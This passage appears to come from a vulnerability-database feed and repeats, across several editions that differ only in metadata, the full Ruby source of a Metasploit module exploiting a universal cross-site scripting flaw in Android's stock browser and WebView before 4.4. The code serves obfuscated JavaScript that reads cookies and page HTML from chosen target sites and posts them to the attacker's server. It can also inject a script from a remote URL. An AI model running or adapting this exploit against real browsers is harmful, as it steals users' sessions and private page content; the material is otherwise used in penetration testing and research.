])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-02-26T10:53:29", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T13:08:11", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-12T13:08:11"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-12T13:08:11", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T15:15:57", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-12T15:15:57"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-12T15:15:57", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-18T03:49:23", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-18T03:49:23"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-18T03:49:23", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-18T05:43:00", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-18T05:43:00"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-18T05:43:00", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-19T21:53:22", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-19T21:53:22"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-19T21:53:22", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-19T23:46:10", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-19T23:46:10"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module 